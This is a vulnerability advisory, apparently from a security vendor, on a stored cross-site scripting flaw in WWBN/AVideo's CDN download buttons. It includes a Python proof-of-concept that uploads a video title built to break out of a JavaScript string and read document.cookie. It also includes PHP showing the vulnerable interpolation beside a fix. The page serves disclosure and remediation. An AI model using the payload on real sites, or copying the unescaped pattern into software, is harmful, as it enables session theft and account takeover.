Summary
WWBN/AVideo contains a stored cross-site scripting vulnerability in the CDN plugin's download buttons component. The clean_title field of a video record is interpolated directly into a JavaScript string literal without any escaping, allowing an attacker who can create or modify a video to inject arbitrary JavaScript that executes in the browser of any user who visits the affected download page.
Details
At line 59 of plugin/CDN/downloadButtons.php, the following PHP constructs a JavaScript function call inside the page's inline script:
downloadURLOrAlertError(url, {}, '<?php echo $video['clean_title']; ?>.' + format, progress);
The clean_title value is echoed verbatim inside a single-quoted JavaScript string literal. No JavaScript-context encoding is applied. The correct treatment for this context is json_encode with the JSON_HEX_TAG, JSON_HEX_APOS, JSON_HEX_QUOT and JSON_HEX_AMP flags, which emits a complete, quoted JS literal and hex-escapes the characters that could terminate either the literal or the enclosing script element; htmlspecialchars is not a substitute, because entity references are not decoded inside a script body, so it corrupts the value instead of encoding it for this context. Because the value sits inside a JS string delimited by single quotes, a title containing a single quote terminates the literal early and whatever follows is parsed as JavaScript (a title containing </script> closes the script element outright, quotes or not). clean_title is derived from the user-supplied video title, so any account with video creation or editing privileges can plant such a title. The injected script runs in the session of whoever loads the download page for that video, which may include administrators or other users with elevated privileges.
PoC
import requests

# Endpoints and form field names as given in this PoC; confirm them against
# the target's own login and upload forms before running.
target = "https://example.com"
login_url = f"{target}/user"
upload_url = f"{target}/video/addNew"

session = requests.Session()

# Authenticate as a low-privilege account that is allowed to create videos.
login = session.post(login_url, data={
    "user[user]": "attacker",
    "user[pass]": "attackerpassword"
})
login.raise_for_status()

# The title closes the single-quoted JS literal and the function call,
# injects alert(document.cookie), and comments out the rest of the line.
malicious_title = "');alert(document.cookie);//"

upload = session.post(upload_url, data={
    "title": malicious_title,
    "description": "poc"
})
upload.raise_for_status()
After the video is created, navigate to:
https://example.com/plugin/CDN/downloadButtons.php?videos_id=<TARGET_VIDEO_ID>
If the exploit succeeded, the page source contains the following line, in which the title has closed the string literal and the function call and commented out the remainder of the original statement (if the single quote is missing from the rendered line, the title-to-clean_title transformation on that build altered it and the payload needs adjusting):
downloadURLOrAlertError(url, {}, '');alert(document.cookie);//.' + format, progress);
Impact
Any user who can create or edit a video can store JavaScript that executes in the browser of every other user who visits the download page for that video, including administrators whose sessions a low-privilege attacker may target. Successful exploitation enables actions performed on behalf of the victim within the application and credential harvesting; reading the session cookie through document.cookie, as the PoC does, additionally requires that the cookie not be marked HttpOnly. Because the payload is stored server-side and fires on page load, no further attacker interaction is needed, and every user who opens a download page for an attacker-controlled video is exposed.
Untrusted input is written into an inline script that the victim's browser executes in their session. Typical impact: session or credential theft, and actions taken as the user.
Affected versions
wwbn/avideo (composer) <= 25.0, per the advisory data in the FAQ below.
Security releases
None listed yet; monitor the advisory for a fixed version.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
In the interim: encode clean_title for the JavaScript string context it is written into, using json_encode with the JSON_HEX_TAG, JSON_HEX_APOS, JSON_HEX_QUOT and JSON_HEX_AMP flags (which emits its own quotes, so the template must not add any), or move the value into an HTML attribute encoded with htmlspecialchars and ENT_QUOTES and read it from JavaScript through the element's dataset. A Content Security Policy helps here only if the inline script containing this call is moved to an external file and inline script is disallowed: the injection lands inside an existing script block, so a nonce or hash on that block would cover the payload as well. Marking the session cookie HttpOnly blocks document.cookie theft but not actions performed in the victim's session.
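The vulnerable line from the Details section beside the hardened form recommended here, as an added example that is not AVideo's own code: $video is a constructed stand-in for the video record, and renderVulnerable, renderHardened and jsString are names chosen for this illustration. The input is the PoC title from above.

```php
<?php
// Added example, not AVideo's own code: the vulnerable pattern from
// plugin/CDN/downloadButtons.php beside a hardened replacement.
// $video is a constructed stand-in for the video record; renderVulnerable,
// renderHardened and jsString are names chosen here for illustration.

// Constructed record carrying the PoC title.
$video = ['clean_title' => "');alert(document.cookie);//"];

// Vulnerable: raw interpolation into a single-quoted JS string literal.
// A ' in the value ends the literal; a </script> ends the script element.
function renderVulnerable(array $video): string
{
    return "downloadURLOrAlertError(url, {}, '" . $video['clean_title']
        . ".' + format, progress);";
}

// Emit a complete JS string literal (quotes included) for use inside an
// inline <script>. The HEX flags turn < > ' " & into \uXXXX escapes, so the
// value can terminate neither the literal nor the enclosing script element.
function jsString(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
        | JSON_UNESCAPED_UNICODE | JSON_THROW_ON_ERROR
    );
}

// Hardened: the literal is produced by jsString, so the template no longer
// wraps untrusted data in quotes of its own.
function renderHardened(array $video): string
{
    return "downloadURLOrAlertError(url, {}, " . jsString($video['clean_title'] . '.')
        . " + format, progress);";
}

echo renderVulnerable($video), PHP_EOL;
echo renderHardened($video), PHP_EOL;
```

Run it with the php command line: the first line printed is the broken-out call shown in the PoC; the second carries the title as a double-quoted literal in which the apostrophe has become \u0027 and the forward slashes \/, so the browser evaluates it as an ordinary filename prefix. In the template itself the fix is to emit jsString($video['clean_title'] . '.') in place of the quoted interpolation.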
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33295? CVE-2026-33295 is a high-severity cross-site scripting (XSS) vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. No fixed version is listed yet. Untrusted input is written into an inline script in a victim's browser, which runs in their session.
- Which versions of wwbn/avideo are affected by CVE-2026-33295? wwbn/avideo (composer) versions <= 25.0 are affected.
- Is there a fix for CVE-2026-33295? No fixed version is listed for CVE-2026-33295 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-33295 exploitable, and should I be worried? Whether CVE-2026-33295 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-33295 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33295? No fixed version is listed yet. In the interim: encode clean_title for the JavaScript string context it is written into (json_encode with the JSON_HEX_TAG, JSON_HEX_APOS, JSON_HEX_QUOT and JSON_HEX_AMP flags), or move the value into an HTML attribute and read it from JavaScript. A Content Security Policy reduces the impact only if the inline script containing the call is externalized and inline script is disallowed.